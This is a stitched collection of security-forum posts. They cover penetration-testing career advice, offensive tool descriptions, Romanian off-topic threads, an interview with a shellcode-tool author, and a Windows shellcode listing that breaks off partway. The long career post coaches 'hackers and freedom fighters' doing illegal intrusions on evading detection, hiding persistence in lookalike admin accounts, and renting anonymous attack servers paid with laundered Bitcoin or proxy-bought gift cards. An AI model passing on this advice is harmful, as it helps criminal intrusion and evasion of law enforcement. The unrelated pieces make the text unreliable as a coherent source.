Leaderboard

Hello everyone. I joined this community a while ago; I have/had been a lurker for even longer. A huge part of what made the hacker community what it was (and what it is here) involves a willingness to share knowledge (without spoonfeeding). I would feel remiss if I gained so much from so many of you and did not give something back on occasion. What follows are anecdotes, opinions and observations I can share after almost 7 years working professionally in the InfoSec/Netsec field. Most of my work in this sphere has been anchored in Penetration Testing. Even when my official designation was Network Security Analyst, I spent most of those 3 years in engagements against PCI environments utilized for subcontracting work from Comcast, Verizon, Time Warner, Sprint and AT&T (to name a few of my former employers clients). Currently, I manage the Cybersecurity Lab of an International company that employees over 200,000 employees. Most of my work in my current position involves Penetration Testing (every type imaginable, including focused blackbox testing against embedded devices and the network/control structures surrounding them). I am also a lead point of contact for our international teams during remediation and triage of major security threats, incidents and breaches. For example, I was the my company’s head analyst for the recent Shamoon 2.0 attacks (W32.DisttrackB/W97M.Downloader) last February, as well as the recent Wannacry outbreak. I also serve in a Security Engineer capacity, as I am regularly asked to evaluate facets of our products and provide feedback and opinions on the security ramifications involved. I am extremely busy and wanted to give back what I have taken thus far, so this is going to be long... Here goes nothing: 1) I am completely self taught (meaning I acquired no college/formal education to get where I am). That being said, a solid Computer Science degree is invaluable as a base (I would generally avoid Cybersecurity degrees and go for CS ), and even the degree itself will open doors into this business. Also, I work alongside high-level engineers (CS and Electrical Engineering PhDs); what they can do in a short period of time once they take an interest in InfoSec/NetSec is frightening. 2) That leads me to this: to be great in this industry ( or great for this industry), I believe that InfoSec/NetSec has to become a lifestyle,not just a job. I easily work 80+ hours a week (every week) between work, further study and skills building. And I love just about every minute of it. There is a huge need for InfoSec/NetSec professionals,which I feel is going to lead to a flood of low knowledge, low passion, low skill hiring. Anyone trying to get into this industry for the cash alone is going to have a rude awakening: there are probably lower pressure, lower work hour ways to earn the same money doing something that actually interests you.. Also, those of us really invested in these arts can pretty easily spot our own. 3) Learn to study, and learn to love the act of studying. Much of this job is continual study; eventually, when presented with an issue youare ignorant of, you will feel confident in knowing that you can find the answers you need. Break the issue into small, manageable pieces (goals really), and put the pieces together until you can view the whole answer. 4) Most of my success in this industry has been due to a willingness to work hard, persevere and never give up. Ever. Most of this job is the creative solving of problems that do not or may not have any easy answer (or any answer at all…yet). You have to build a no retreat, no surrender, obsessive need to conquer problems. 5) I specialize in network penetration, though I have become fairly well rounded. To me, network penetration is the art of acquiring advantages. During an engagement, I am always looking to acquire advantages. I study and train to better recognize and maximize the resources within an environment that allow me to gain those advantages. Gaining these advantages are more a product of knowledge and experience then an application of tools. 6) I am also looking to be efficient; the best penetration tests replicate real world attacks. In that vein, each action you take raises the probability that you will be detected. For hackers and freedom fighters engaged in illegal activity,you may want to consider the latter a bit. Once you make ingress and launch any manner of offensive action, you have escalated the legal ramifications of your trespass by multiple magnitudes. Also remember that the probability of you getting caught and prosecuted is never 0.00%: you have to be prepared, you have to be careful, you have to be patient and you have to prepare contingencies. 7) I use a measurement/assessment of risk vs. reward to make each action within the network as efficient as possible; by percentages,losing a queen to take a rook is generally a loser’s bet. The best way I’ve learned to temper a careful approach is with an old sales slogan (“ Always be closing the deal”, which I modified to “Always be advancing your position(s)”). 7) I try as much as possible to engage a target as a stalking, ambush predator: I move carefully and try to use the environment to hide myself as I seek to exploit the target/objectives lack of awareness. I work to remain patient and identify/quantify as many of the variables of the current environment/situation as possible. Sometimes the best decision you can make is to slow down or hold your current position for a bit; watching Tcpdump or Wireshark while thinking on a better move is still advancing your position. 8) To lower the probability of detection (whenever possible) I attempt to attack, enumerate or probe from an obfuscated position. Configuring your attack host/node for the highest probability of situational anonymity (using tunneling, proxies, encapsulation ,etc.) is infinitely useful in pentesting, hacking and/or general security/privacy. Mastering the manipulation of proxy, tunneling and encapsulation protocols (which involves a deep understanding of networking/TCP/UDP) almost lends you quasi-magical invisibility and teleportation powers when involved in network penetration. Obfuscation itself is one of 10,000 reasons why experience/knowledge in the disciplines of networking, OS and programming combined with security research are such huge advantages (and another reason why if you take up this path you may never stop learning). 9) Learn to use every tool you can, but more importantly, learn why the tool works. If you work in/at exploitation long enough, the principles governing the tools will help you exploit a box someday,regardless of whether you use that particular tool to get the wanted/needed result.. 9) Knowledge/experience over tool use is especially important today: regardless of what many sites say, you will not find many enterprise/corporate networks today (as a professional penetration tester at least) where there are gross configurations/deployments leading to an easy, out of the box (deploy tool== Meterpreter) exploitation. 10) When training for a fight, professional mixed martial artists put themselves in the worst possible positions so they react properly when the fight is underway. Eventually, training/practicing your exploitation/research techniques the same way will be a huge boon in engagements, POCs (or in the wild). I especially like to round difficulty up during research; it is difficult for someone else to minimize your findings if you have added (and circumvented) greater security measures than the norm (rather than having reduced them). 11) Most of my exploitation of networks in the last couple years have been a process of discovering network misconfigurations and weaknesses (especially in Windows firewall, Programs and Features, LGPO/GPO policies and/or IE/Internet Options within Window Domains/Networks) or information leaks that I locate online or through DNS enumeration that ultimately leads to my gaining access to a host. From there, remote exploitation (toward post exploitation/privilege escalation/pivoting) will often occur This is largely when knowledge of things such as Powershell (leveraged by itself or tools like Powersploit/CrackMapExec/PsExec/Empire) become invaluable (in Windows networks). I have actually been finding easier remote exploits when attacking Linux/Unix boxes in enterprise networks (finding Solaris with Apache Tomcat during enumeration still springs hope eternal in my human breast). Many (actually, maybe all) of these companies are/were new at deploying Unix/Linux boxes in their networks and were making some serious mistakes with deployment. 12) Enumeration is the most important part of an engagement to me. You should get used to enumeration without automated tools; I love Nmap, but many times it is not feasible to usewithin the customer’s network (network overhead issues, the chance of detection by IIDS, the chance of breaking PLCs or other embedded devices, etc.). In cases where you are on the customer’s network, tools like Wireshark, Tcpdump, knowledge of networking protocols/ports and banner grabbing are your friends. 13) For those engagements where you first need to gain access to the network, you definitely have more room for running some louder tools: I love Fierce (and DNS enumeration in general) as it often presents my way in. Google dorking is still also an incredible tool, as is Firefox with the right set of extensions (Hackbar, Tamperdata, Wappalyzer, BuiltWIth, Uppity, IP Address and DOmain Information, etc,.). Who loves Dirbuster in these cirumstances? This carbon/caffeine based lifeform right here. Whether you are pentesting, bughunting or hacking/freedom fighting, a paid Shodan subscription will($50) is worth every cent. The capacity to make exacting, accurate searches for greater than five pages has helped me in more engagements/bughunts than I can remember. 14) When I am explaining why a config/setting/LGPO /GPO (etc.) is a security risk to a client or my fellow employees, I like to explain that many of the advantages I look for in my environment are most often advantages that are needlessly provided to me. If it does not break key functionality or seriously impede efficiency/development time, than it is in their best interest to deny me as many advantages as possible, even when the advantages appear as if they are minutia. When dealing with a client or non-security fellow employees,you should work to create a relationship of mutual help and teamwork. I am not there to rub their noses in there crap; I am there to help improve their security so the company can prosper. This is partially a customer service gig where solutions (remediation/counter measures) are more beneficial to the customer than the exploitation itself. Whenever possible, I like to end the post-exploitation/penetration test conversation/meeting/presentation with the attitude that I am here to help fix these issues , how can WE best close these gaps? How can I help make your (or our) company safer, so that we can become more prosperous? 15) I personally despise Microsoft (and many proprietary products/companies) on many levels, but when it comes to work, I am platform agnostic. Whatever tool is needed to complete the mission is the tool I am going to employ. However, whenever possible without jeopardizing the mission, I am going to employ an Open Source/Unix/Linux-centric solution. I work hard to show my company the value in Open Source. The way to show that value isn’t to be the super Unix/Linux/GPL neckbeard who constantly bemoans proprietary software./platforms. The best way (for me), is to show how effective the strategy involving the Open Source tool is. Then, in my report, I explain the business hook of using Open Source (if the tool is free for commercial use). I am sensitive to companies taking Open Source tools and turning them into something proprietary. However, if I can make my company (which is both huge and almost universally recognized as ethical, which is rare) see the value in Open Source, I know they will eventually incorporate Open Source into the support packages for their products (which they have while keeping the tools ad the license in tact). This than spreads the value of Open Source to smallercompanies who see it being trusted by a much larger company. 16) I have tens of thousands of dollars worth of licenses atmy disposal. However, I will never use tools like Nexpose, Nessus, Canvas orMetasploit Pro unless the project, client, or a governing body specificallyrequire them. I believe these tools develop poor habits. Obviously, if a project such as evaluating an entire domain of IP/hosts for vulnerabilities is my task, I am going to use Nessus. However, (whenever a time/project permits, which they most often do) I am going to evaluate the findings (and search for other vulnerabilities) manually. 17) The ultimate goal should be reliance on nothing more than a Linux/Unix Terminal, some manner of network access and a programming language. One of my favorite exploitation tools is my Nexus 7 2013 flo tablet (running a modified version of Nethunter) and a Bluetooth folio keyboard ( I got the idea from n-o-d-e, https://www.youtube.com/watch?v=hqG8ivP0RkQ44) as the final product is a netbook that fits in a jacket pocket). I have exploited some seriously huge clients with thislittle rig (for ingress and a quick root shell, WPS on network/enterpriseprinters and knowledge PCL/PJL/Postscript are often your friend). I have also exploited other customers with a cheap UMX smartphone with 5 gigs of storage, 1 gb of memory and GNUroot Debian (Guest Wifi access from the parking lot or an onsite public restroom, human nature, and Responder.py analyze mode, followed by WPAD, LLMNR and NetBios poisoning with NTLMv1 and LM authorization downgradefor the win). 18) During (red team, onsite, etc.) engagements, even when the ultimate target of the engagement is located on a hardwired network with heavy segmentation/compartmentalization (such as the conduit/zone based layouts that are general best practice in Industrial sectors), it is always worthgaining a host/node with corporate WIFI access. One thing WIFI access provides is reach: an Administrator’s (or other privileged user’s) dedicated workstation may be out of reach, but his other devices (if in scope) may be connected to Corp. WIFI for reasons such as saving data on a plan. Also, WIFI allows me attacks of opportunity even when I am doing other things. Running Responder.py on a misconfigured network’s WIFI while I am elsewise engaged is gaining me advantages (maybe clear text creds, maybe hashes, maybe NTLMv1 and LM hashes) at little cost to my time or attention. When I employ this, I like to spoof the poisoning machines hostname/mac address to something familiar on the network. If you see a bunch of hosts named “Apple” during your recon, and all of those hosts are not online, spoof the hostname/MAC to match one of the Apple machines (this will not withstand close scrutiny, but will often suffice with a little work). It always helps to watch and take note on the norms of the network traffic and protocols. Try to match this as much as possible (this will likely help you avoid IDS/IPS, firewall rules, etc.) and whatever traffic would seriously stand out, try to tunnel or encapsulate with normal network traffic/protocols. 19) This leads to two other points: A) Be prepared for the majority of people within a company who do not care about, or will minimize security issues. Do not get frustrated; I find that showing the parties involved what they stand to lose as a company from a vuln to be more effective than focusing on the vuln itself. This is where the Nexus and cheap smartphone come into play: taking the client’s domain with a laptop may scare up some results, but showing s customer that an attacker could cost them tens of millions with a $20 dollar smartphone or a $100 dollar tablet (from the parking lot) works wonders. C) I have an interest in learning to exploit everything and anything. This has served me well during network penetration tests, as many targets will defend their DCs, file servers and hosts, but not pay much attention to the printers and IoT devices within the network. D) To this end, learn to work with uncommon protocols. UPnP. NTLDNA and SSDP have been serving me well for the last couple years. Many file servers (and company smartphones/tablets when they are in scope) keep the UPnP door (and associated protocols) wide open. I once grabbed SNMP and other default network appliance creds from a fileserver through UPnP. 20) If you are going to pay for certs with your own cash, I recommend the OSCP. Yes, some of the machines/exploits are outdated. You won’t find many of the SMB remote exploits used for the course in the wild very often anymore (unless an Admin leaves a test server up, which happens occasionally). However, the overall experience, breakdown on enumeration methodology, self reliance and mindset the entire experience teaches you are invaluable. I have seen some sites peddling garbage certs with no industry recognition. Save your money for the OSCP; its profile in the industry is high and growing. Certs are no replacement for experience, but starting out with a IT/CS related degree or some general IT experience (even Helpdesk work) along with the OSCP will get you hired somewhere. 21) For persistence, I prefer adding innocuous user accounts/Remote Desktop accounts. If I am going to add some manner of privileged user account early to mid engagement, I usually try to add a more low profile account (if I have the option) such as Server Operator; these type of accounts allow privileged access you can build from, but generally are not watched with the scrutiny of an Administrator account. When I do create Administrator accounts (I try to wait until I begin my endgame), I will try to match the naming convention to similar accounts in within the network. if a For example, if the Administrator accounts within the network are named USsupervisor, I will name the added account something like USupervisor. If I know the clear text password of the account I have mimicked, I will use the same password. 22) Keep good notes during the engagement; too much information is better than to little information. Captured PCAPS of network traffic are great for examination during down time between engagements. 23) If you are a hacker, freedom fighter, or someone generally concerned about max privacy, this series of articles and configurations are for you: https://www.ivpn.net/blog/privacy-guides/advanced-privacy-and-anonymity-part-146 24) My favorite distro is Backbox; it starts out with a solid set of tools ninus the obscure bloat (and so far I have been able to add anything Kali has to Backbox). You can use Backbox's "Anonymous" option for a full transparent Tor proxy, Macchanger and host name changer and set RAM to overwrite on exit. I also keep Portable Virtualbox on a USB drive with a Kali Linux image... You could follow some of the advice here: http://www.torforum.org/viewtopic.php?f=2&t=1832020 And here: http://www.torforum.org/viewtopic.php?f=2&t=1832020 The articles above could help you create an encrypted USB with a Whonix gateway and Kali Linux workstation (you could probably exchange Kali OS in the Whonix Workstation for any Debian/Debian like OS). This configuration is disposable and concealable, and will run all of the Kali Workstation's (or other Debian/Debian like OS) through Tor. You could also create multiple other Vanilla Whonix Workstations/Gateways on the USB to create a type of local jumpbox sequencea to tunnel between/through SSH and/or VPN them before final Kali workstation. (Note: This is just a gut feeling, but for your own OpSec/security/anonymity, you are probably best replacing the Kali workstation with another Debian/Debian like distro. I have tried Katoolin in the Whonix Workstation, but I find that Katoolin often breaks i). 25) A VPS with your pentest tools installed is a valuable commodity; I call mine DeathStar, and I can call down some thunder from my Nexus 7 2013 flo (and a prepaid Wireless hotspot) from pretty much anywhere. There are some providers who do not give a damn about the traffic leaving your VM as long as you are using a VPN and a DMCA does not come their way. For hackers and freedom fighters, get your VPS from a country outside 14 Eyes countries (providers in Eastern European/former Soviet Block countries can be both dirt cheap and extremely honorable; just do your research and have tolerance for the occasional technical issue). You could pay with laundered/tumbled Bitcoin; even better are those providers who except gift cards (much like some VPN providers do)as payment. Have another party buy the gift cards a good distance away from you; you can find some of these providers who take gift cards on Low End Box. The VPS can be a valuable addition to the encrypted USB above (as you now have a host/node to catch your reverse shells without sacrificing Tor) when combined with SSH or IPsec (such as Strongswan, which is in the Debian repos). 26) Again, this post was long because I am busy, and Iwanted to make the contribution I felt I owed this site since shortly after it began. If you have technical questions concerning (or any questions in general), please post them as comments and I will definitely get you back an answer. https://0x00sec.org/t/shared-thoughts-after-6-years-in-pentesting/2492

Going Further with Responder's Basic Authentication There are a good number of situations when we find ourselves abusing the LLMNR and NBT-NS protocols on an infrastructure penetration test, more specifically on an Active Directory setup. These 2 protocols are enabled by default on most of the Windows operating systems. What are they doing is they facilitate the communication between network machines when searching for a DNS hostname regardless if it’s a share, a server or a web hostname. The overview picture of the attack vector: the victim is looking for a non-existing hostname the DNS server cannot resolve the request we reply and resolve the hostname resolution query we ask the victim for authentication

Shellcode Compiler Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way. Shellcode Compiler takes as input a source file and it uses it's own compiler to interpret the code and generate an assembly file which is assembled with NASM (http://www.nasm.us/). Shellcode compiler was released at DefCamp security conference in Romania, November 2016. Link: https://github.com/NytroRST/ShellcodeCompiler

/xxx/ este folosit pentru expresii regex

au cumparat deja pestii cei mari toate paginile mari si bune, daca ai un buget considerabil si ai habar in ce te bagi cea mai buna solutie e sa-ti cresti singur (fb ads) o pagina targetata si rezultatele vor fi 10x mai bune decat sa arunci banii pe paginile altora.

Ok, la o privire am observat o sumedenie de probleme; voi enumera cateva: Nici o variabila indiferent de tipul de date nu ar trebui instantiata null. Cand e vorba de referinte ele sunt deja null iar tipurile de valori vor fi instantiate cu valorile default. ex: val type: int number; - variabila va fi 0 ref type: string val; - va fi null nu e nevoie de defaut(string) sau sa o declari tu asa; Interfata trebuie initializata cu clasa pe care o implementeaza sau, se poate declara urmand sa fie initializata ulterior. ex: ICryptoTransform encryptor = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes); In .net orice clasa care deriva din stream, implementeaza interfata IDisposable, apelarea metodelor close/dispose va reflecta si in clasa derivata; prin urmare nu trebuie sa apelezi stream.Close() Avand in vedere ca erorile astea le-am gasit intr-o singura metoda dintr-o clasa cred ca ar fi util sa citesti mai multe despre .net in cazul in care te intereseaza domeniul asta. Ar mai fi fost de discutat despre mai multe aspecte cum ar fi error checking, patterns, memory allocation, code reuse. Si pentru ca nu-mi place sa critic fara sa dau argumente voi lasa un exemplu cam cum ar fi trebuit sa arate metoda la care fac referire (probabil tot codul e varza, dar ma voi limita la ce am vazut): using (var symKey = new RijndaelManaged()) { var ms = new MemoryStream(); try { symKey.Mode = CipherMode.CBC; ICryptoTransform cryptor = symKey.CreateEncryptor(keyBytes, initVectorBytes); using (var cs = new CryptoStream(ms, cryptor, CryptoStreamMode.Write)) { cs.Write(plainTextBytes, 0, plainTextBytes.Length); cs.FlushFinalBlock(); } return Convert.ToBase64String(ms.ToArray()); } catch (CryptographicException ex) { throw ex; } catch (Exception ex) { throw ex; } } In orice caz initiativa e de laudad, continua. Pentru inceput poti incepe de aici: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/

gigel ce a deschis topicul. - Il cauta potentialii clienti, nu raspunde la nimeni ... - Ofera backlinks pe niste site-uri care defapt nu sunt ale lui si multe altele

CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all requests, the tool as of right now has 3 different attack phases. Misconfigured DNS scan using DNSDumpster.com. Scan the Crimeflare.com database. Bruteforce scan over 2500 subdomains. Please feel free to contribute to this project. If you have an idea or improvement issue a pull request! Disclaimer This tool is a PoC (Proof of Concept) and does not guarantee results. It is possible to setup CloudFlare properly so that the IP is never released or logged anywhere; this is not often the case and hence why this tool exists. This tool is only for academic purposes and testing under controlled environments. Do not use without obtaining proper authorization from the network owner of the network under testing. The author bears no responsibility for any misuse of the tool. Usage To run a scan against a target: python cloudfail.py --target seo.com To run a scan against a target using Tor: service tor start (or if you are using Windows or Mac install vidalia or just run the Tor browser) python cloudfail.py --target seo.com --tor Dependencies Python3 argparse colorama socket binascii datetime requests Download:https://github.com/m0rtem/CloudFail

http://economie.hotnews.ro/stiri-finante_banci-21835511-peste-saptamana-intra-vigoare-noile-conditii-acordare-scutirii-venitul-din-salariile-programatorilor-vezi-text-conditiile-care-acorda-scutirea.htm http://www.avocatnet.ro/content/articles/id_44601/De-maine-mai-mulți-programatori-vor-beneficia-de-scutirea-la-impozitul-pe-venit.html Pareri?

Salut. Ca tot mi-ai scris si in privat si ai postat si in public, cateva mentiuni, poate vad si altii interesati: - Felicitari pentru ca vrei sa pleci din Babuinland! Probabil va fi una din cele mai bune decizii pe care le vei lua vreodata. Nu conteaza unde (UK, mainland EU, Scandinavia), atat timp cat pleci de acolo. - E foarte bine ca te interesezi de optiuni insa la un moment dat trebuie sa fii decisiv si sa decizi pentru tine si sa accepti "consecintele" deciziei tale. Decat sa asculti de unul care are nu stiu ce cunostinta sau altul care studiaza altceva ori altul care a terminat acum X ani si nu mai stie cum sta treaba ori de altii care sunt habarnisti pur si simplu si isi dau cu parerea. Vezi ca sunt tot felul de league tables si poti vedea cam unde se claseaza fiecare universitate. Apoi fiecare are pe web o pagina a departamentului/cursului si poti vedea ce ofera, cerinte, structura cursului, etc. - care te vor ajuta sa iei o decizie. Parerile altora sunt foarte subiective pentru ca tine de experienta lor. Acest lucru nu este uniform si depinde de multe variabile. Da, iti poate da o idee, dar poate fi foarte inselator, subiectiv. (ma refer la alegerea facultatii aici) - Cat despre a aplica normal prin UCAS sau sa ramai pana in clearing (spot admission) ramane la decizia ta. Trebuie sa cantaresti riscurile si beneficiile si sa te decizi. Dupa cum spun si restul, probabil e prea tarziu prin UCAS insa daca nu e o optiune atunci stii ce ai de facut. - Ai fost scris parca ceva ca vrei la ce facultate e mai buna in domeniu - "bunatatea" lor e direct proportionala si cu concurenta pe locuri si cerintele pentru admitere. Daca ai scos un 5 parlit la mate la bac, nu te astepta sa intri la ceva gen Cambridge. - Spot admission-ul (Clearing) este o metoda pentru a accepta (more or less) rebuturile (no offence). Adica si-au ocupat majoritatea locurilor si confirmat cu cei care au acceptat si acum cauta sa isi umple locurile pe unde mai au liber sa nu mearga pe anul financiar in pierdere. Deci da, este ceva mai "lejer" dpdv al admiterii dar este si mai riscant. Insa probabil nu vei avea de ales daca e prea tarziu. - Cat esti de realist dpdv al cunostintelor tale, tinand cont ca va trebui sa faci totul in engleza? Daca te duci undeva cu nivel ridicat si prin minune esti acceptat iar apoi o tii din restante in restante.. nu iti va conveni. Iar universitatile sunt judecate aspru pe completion rate, retention rate si drop-out rate deci nu se vor risca sa te accepte daca considera ca nu te pot scoate pe usa cu diploma in mana. https://www.topuniversities.com/university-rankings/world-university-rankings/2018 https://www.theguardian.com/education/ng-interactive/2017/may/16/university-league-tables-2018 https://www.thecompleteuniversityguide.co.uk/league-tables/rankings http://www.hefce.ac.uk/tefoutcomes/ https://www.timeshighereducation.com/world-university-rankings (orienteaza-te catre "fund" ) P.S. @aelius, chillax, unde am folosit "fii" este conjunctivul prezent

Mi-aduc aminte ca acum ~6 ani cand am terminat liceul am aplicat si eu la ceva facultati in UK (5 la numar: UCL, Essex, Portsmouth, Warwick si inca ceva). Cred ca pe-atunci se aplica prin ceva platforma care se numea UCAS. Maxim pana in februarie trebuia sa ai totul facut si trimis (mai putin diploma de engleza si notele + foaia matricola din clasele 9-12 pe care evident nu le aveai pana atunci). Ca idee, facultatile bune chiar tin cont de medie si le cam doare in pula daca iti doresti tu extrem de mult sa ajungi acolo sau nu. Cel putin, eu am avut o scrisoare de intentie super misto, insa din cauza mediei pe care am avut-o la bac, nu am intrat la Warwick si UCL. La restu' da. Din cate mi-aduc aminte, contau foarte mult si notele de la materiile aferente profilului pe care doreai sa-l urrmezi. Spre exemplu, daca te duci pe Computer Science, aia se vor uita pe foaie matricola la mediile de la Mate/Info/Fizica + eu spre exemplu am avut scrisoare de recomandare de la profa de Info, ceea ce a contat. In momentul in care aplicai prin UCAS, aveai practic 5 optiuni maxime available si plateai o taxa modica (sub 200 lei). In rest, pe-atunci m-am bagat intr-un program de la EDMUNDO si de-acolo mi-au asignat o gagica super de treaba care m-a ajutat cu sfaturi/acte/traduceri/muie etc. Sfaturi primite de pe la altii pe care merita sa le iei in considerare: - acolo nu merge cu copiatu' cum merge la noi. Ai fost prins, ai fost dat afara. Punct. Oamenii sunt foarte stricti in ceea ce priveste contentu'. Intr-adevar, acolo, o biblioteca de la o oarecare universitate arata ca biblioteca nationala din bucale. (ai de unde sa iti faci temele / proiectele) - daca te duci acolo, invata. Costa 9k lire/an sa inveti. Nu-i face p-ai tai sa se chinuie doar pentru ca ai auzit tu ca e smecher sa pleci si ca se fumeaza iarba in Essex pana se crapa.

1. Esti retardat? 2. Codul introdus de tine nu o sa functioneze niciodata... incearca cu (/litera/) sau cu (numar). 3. Esti retardat? 4. Raportat, rezolvata problema cu cateva zile inainte sa postez aici 5. banii primiti dupa o gramada de insistente prin email si zile de nervi. EDIT: https://www.facebook.com/whitehat/

raportat, rezolvat, astept banii... bani putini, dar e ok... ajunge de cateva beri Destept esti tu, doame ajuta! Daca a zis omul ca e rezolvat si raportat. Normal ca a facut postul dupa ce a anuntat facebook si dupa ce facebook a rezolvat problema si i-a dat voie sa faca disclosure.

Know your community – Ionut Popescu January 16, 2017 SecuriTeam Secure Disclosure Maor Schwartz When we sponsored DefCamp Romania back in November 2016, I saw Ionut Popescu lecture “Windows shellcodes: To be continued” and thought to myself “He’s must be a key figure in the Romanian security community – I must interview him” so I did! Introduction Ionut is working as a Senior Penetration Tester for SecureWorks Romania. Speaker at DefCon and DefCamp, writer of NetRipper, ShellcodeCompiler and a family man. Questions Q: What was your motivation to getting into the security field? A: First of all, the security field is challenging. It’s like a good movie whose main character has to do some tricky moves to find the truth – In the security field it’s he same. Second, it’s fun. Get access to different systems or to exploit applications. Your friends will think you did something really complicated when you actually exploited a simple vulnerability. My motivations were never (and will never be) fame or money, it’s the challenge and learning. Q: When did you get into the security field? A: I got my first computer when I was 16. I used it to play games until I found a small Romanian security forum. I saw that there was a lot of challenging stuff you could do and I became interested in the security field. During this process I learned Visual Basic 6 / HTML / CSS / JS / PHP / MySQL and practiced my web application vulnerability research skills. After some time I became interested in more complicated stuff such as C/C++ and ASM. It’s was step by step learning where the more you know, the more you realize you don’t know. Q: Since you started, you have found vulnerabilities (vBulletin for example), wrote exploitations tools like NetRipper and ShellcodeCompiler. Why did you decide to specialize in offensive security? A: Offensive security is the fun part of security. From my point of view, it is more complicated, more fun and more challenging than defensive security. Let’s take the vBulletin example. I managed a vBulletin installation and I wanted to make sure the forum was secure. I always updated with the latest vBulletin patches, our server was up to date and it even had a few hardening configurations – this is defensive security. But when I decided to take a look on my own at vBulletin, I found an SQL Injection. Guess what made me happier – installing patches and keeping a system up to date or the discovery of an SQL Injection? Since I was young, I was more attracted by the offensive part of security. Q: Why did you develop NetRipper and ShellcodeCompiler? A: A long time ago I discovered that by using API hooking (intercepting Windows function calls) you can do a lot of stuff. While working on an internal penetration test on a limited system, I had the idea that I could capture the traffic made by administration tools in order to pivot to other systems. The idea was not new, but the available tools did not offer what I wanted – a post-exploitation tool to help penetration testers on their engagements. So, I started working on NetRipper, which was released at Defcon 23. Recently, being interested in low-level stuff such as ASM and Windows Internals, I wanted to write my own shellcodes. I did it easily on Linux, but it was a little bit more complicated on Windows. I noticed that you will repeat a lot of the content from one shellcode to another, so I decided to automate this. This idea was also not new. I saw a basic shellcode compiler, but its users had to write ASM code. I wanted a fast and easy way to write one. This is how Shellcode Compiler was born. Q: What is the most innovative project you did as offensive security researcher? A: I think the most innovative project I did as a security researcher is Shellcode Compiler. Even if the idea is not new and the tool is really limited, it turns a difficult job into a really easy one, and anyone can write a shellcode. However, I still need to implement a few features that will make it more useful. I don’t have a lot of free time to work on this project, but I always try to make some time for it. Q: Where did you learn to be an offensive security researcher? A: I started to learn from security forums. I still remember hacky0u forums. Now I get most of my technical stuff from Twitter. My tweets are actually a “to read” list. I like to see that a lot of technical people share their knowledge. I read anything that’s new from blogs, whitepapers and security conferences. I find Twitter is the central place where I can find all this information by following the right people. Q: How big is the security community in Romania? A: The security community in Romania is medium-sized. There are really good security guys in Romania, but many of them don’t have the necessary time to share their knowledge. There are security researchers from Romania that spoke at well-known security conferences, write tools and whitepapers, but not as much as I would like to. In my opinion, it doesn’t matter from where is the researcher – we live in international world, especially the security researchers community. Q: I saw that you are one of the Admins in the Romanian security forums called RST Forums. Why did you open the forum? What was the goal? How helps you to manage it? A: RST Forums is the largest Romanian security community. It is a well-known forum in Romania and most of the content is Romanian. I did not open this forum; a few other guys did it in 2006. However, they decided to leave the community, and so I am just continuing it. The goal is to help young and newbie Romanian learn security. I have friends that visited the forums for game cheats or programming help, eventually they got in to the security field and now they are working as penetration testers for large companies – the forum helped a lot of us in our careers, and that’s why it is still open. I hope many other young Romanians will use it as a way to start their careers in the field of information security. Q: How do you support the security research community today? A: I don’t do as much for the security research community as I would like. The two tools I released, NetRipper and ShellcodeCompiler, were to support the research community. I have written different technical articles and whitepapers and spoken at security conferences. Oh, and I also tweet useful technical stuff. It is not much, but it is something, and I hope someone will find my work useful. Q: Do you have a tool you are working on today? Do you know when you are going to release it? A: Right now, I would like to work on my current projects. I don’t have a new idea for a tool and it is not a good idea to work on one until the other tools are not as fully-featured and stable as I would like them to be. It was a pleasure, Ionut, to talk to you and get so much information on the local Romanian community You’re welcome. Link: https://blogs.securiteam.com/index.php/archives/2916

May he rest in peace! Normal, că toți puțoii cu cont făcut peste noapte habar n-au de istoria forumului și nu cunosc vechii membri. A fost om cu multe skill-uri.

Windows x86 SwapMouseButton shellcode /* Title: Windows x86 SwapMouseButton shellcode Author: Ionut Popescu Date: December 2015 Tested on: Windows 7/Windows 10 Build/Run: Visual C++ Express Edition Shellcode written for educational purposes. Detailed description: - http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/ - http://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/ - http://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/ */ /* ; Shellcode details ; ----------------- xor ecx, ecx mov eax, fs:[ecx + 0x30] ; EAX = PEB mov eax, [eax + 0xc] ; EAX = PEB->Ldr mov esi, [eax + 0x14] ; ESI = PEB->Ldr.InMemOrder lodsd ; EAX = Second module xchg eax, esi ; EAX = ESI, ESI = EAX lodsd ; EAX = Third(kernel32) mov ebx, [eax + 0x10] ; EBX = Base address mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew add edx, ebx ; EDX = PE Header mov edx, [edx + 0x78] ; EDX = Offset export table add edx, ebx ; EDX = Export table mov esi, [edx + 0x20] ; ESI = Offset namestable add esi, ebx ; ESI = Names table xor ecx, ecx ; EXC = 0 Get_Function: inc ecx ; Increment the ordinal lodsd ; Get name offset add eax, ebx ; Get function name cmp dword ptr[eax], 0x50746547 ; GetP jnz Get_Function cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA jnz Get_Function cmp dword ptr[eax + 0x8], 0x65726464 ; ddre jnz Get_Function mov esi, [edx + 0x24] ; ESI = Offset ordinals add esi, ebx ; ESI = Ordinals table mov cx, [esi + ecx * 2] ; Number of function dec ecx mov esi, [edx + 0x1c] ; Offset address table add esi, ebx ; ESI = Address table mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) add edx, ebx ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ebx ; Kernel32 base address push edx ; GetProcAddress push ecx ; 0 push 0x41797261 ; aryA push 0x7262694c ; Libr push 0x64616f4c ; Load push esp ; "LoadLibrary" push ebx ; Kernel32 base address call edx ; GetProcAddress(LL) add esp, 0xc ; pop "LoadLibrary" pop ecx ; ECX = 0 push eax ; EAX = LoadLibrary push ecx mov cx, 0x6c6c ; ll push ecx push 0x642e3233 ; 32.d push 0x72657375 ; user push esp ; "user32.dll" call eax ; LoadLibrary("user32.dll") add esp, 0x10 ; Clean stack mov edx, [esp + 0x4] ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ecx mov ecx, 0x616E6F74 ; tona push ecx sub dword ptr[esp + 0x3], 0x61 ; Remove "a" push 0x74754265 ; eBut push 0x73756F4D ; Mous push 0x70617753 ; Swap push esp ; "SwapMouseButton" push eax ; user32.dll address call edx ; GetProc(SwapMouseButton) add 